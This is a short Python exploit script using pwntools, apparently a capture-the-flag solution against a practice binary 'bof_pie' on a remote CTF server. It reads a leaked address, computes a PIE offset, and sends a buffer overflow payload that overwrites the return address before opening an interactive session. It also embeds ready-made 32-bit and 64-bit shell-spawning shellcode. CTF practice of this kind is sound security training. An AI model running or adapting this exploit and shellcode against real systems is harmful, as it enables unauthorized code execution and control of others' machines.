from pwn import *
from Crypto.Util.number import long_to_bytes


# r = process("./bof_pie")


shellcode32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
shellcode64 = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"

'''
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : Partial
'''

r = remote("ctf.j0n9hyun.xyz", 3008)

# r.recvline()
r.recvuntil("is ")

flag = int(r.recv()[2:-1], 16)

offset = 0x909 - 0x890

payload  = b""
payload += b"a" * 0x16
payload += p32(flag - offset)

r.sendline(payload)

r.interactive()









